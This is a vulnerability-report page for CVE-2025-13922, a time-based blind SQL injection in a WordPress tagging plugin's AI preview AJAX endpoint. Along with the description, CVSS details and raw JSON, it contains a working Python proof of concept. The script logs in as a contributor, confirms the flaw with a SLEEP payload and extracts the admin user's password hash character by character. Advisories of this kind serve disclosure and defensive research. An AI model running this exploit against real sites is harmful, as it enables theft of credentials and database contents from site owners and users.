Security Vulnerability Report
中文
CVE-2025-13922 CVSS 6.5 MEDIUM

CVE-2025-13922

Published: 2025-12-06 05:16:44
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Tag, Category, and Taxonomy Manager – AI Autotagger with OpenAI plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'existing_terms_orderby' parameter in the AI preview AJAX endpoint in all versions up to, and including, 3.40.1. This is due to insufficient escaping on user-supplied parameters and lack of SQL query parameterization. This makes it possible for authenticated attackers, with Contributor-level access and above who have AI metabox permissions, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database, cause performance degradation, or enable data inference through time-based techniques.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Simple Tags plugin < 3.40.1 (所有版本直至3.40.1均受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time target_url = "https://target-site.com/wp-admin/admin-ajax.php" # Authentication credentials with Contributor role and AI metabox permissions auth = { "username": "attacker", "password": "password123" } session = requests.Session() # Login to WordPress login_url = "https://target-site.com/wp-login.php" session.post(login_url, data=auth) # POC: Time-based Blind SQL Injection via existing_terms_orderby parameter # This payload tests if the vulnerability exists by causing a 5-second delay def test_sqli(): """ Test for CVE-2025-13922: SQL Injection in Simple Tags plugin The 'existing_terms_orderby' parameter is vulnerable to time-based blind SQL injection """ # Payload to test vulnerability - causes delay if vulnerable # This extracts the first character of the database user payload = "term_id AND (SELECT CASE WHEN (SUBSTRING((SELECT user()),1,1)='r') THEN SLEEP(5) ELSE 0 END)" params = { "action": "stax_ai_preview_terms", # AI preview AJAX action "existing_terms_orderby": payload, "taxonomy": "post_tag" } start_time = time.time() response = session.get(target_url, params=params) elapsed_time = time.time() - start_time if elapsed_time >= 5: print("[+] Vulnerability confirmed! Time-based SQL injection works.") print(f"[+] Response time: {elapsed_time:.2f} seconds") else: print("[-] Vulnerability not detected or target not vulnerable") print(f"[-] Response time: {elapsed_time:.2f} seconds") def extract_data(): """ Extract database information using time-based blind SQL injection This is a simplified example - real attacks would iterate through all characters """ charset = "abcdefghijklmnopqrstuvwxyz0123456789_@" result = "" for pos in range(1, 33): # Extract 32 characters (typical hash length) for char in charset: payload = f"term_id AND (SELECT CASE WHEN (SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),{pos},1)='{char}') THEN SLEEP(2) ELSE 0 END)" params = { "action": "stax_ai_preview_terms", "existing_terms_orderby": payload, "taxonomy": "post_tag" } start_time = time.time() session.get(target_url, params=params) elapsed_time = time.time() - start_time if elapsed_time >= 2: result += char print(f"[+] Extracted so far: {result}") break print(f"[+] Final result: {result}") if __name__ == "__main__": test_sqli()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13922", "sourceIdentifier": "[email protected]", "published": "2025-12-06T05:16:44.397", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Tag, Category, and Taxonomy Manager – AI Autotagger with OpenAI plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'existing_terms_orderby' parameter in the AI preview AJAX endpoint in all versions up to, and including, 3.40.1. This is due to insufficient escaping on user-supplied parameters and lack of SQL query parameterization. This makes it possible for authenticated attackers, with Contributor-level access and above who have AI metabox permissions, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database, cause performance degradation, or enable data inference through time-based techniques."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/simple-tags/tags/3.40.1/inc/class.admin.php#L1406", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/simple-tags/tags/3.40.1/modules/taxopress-ai/classes/TaxoPressAiAjax.php#L180", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3408243%40simple-tags%2Ftrunk&old=3388829%40simple-tags%2Ftrunk&sfp_email=&sfph_mail=#file17", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-13922/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f40cc632-c6af-4c8b-a455-76319f7fe151?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.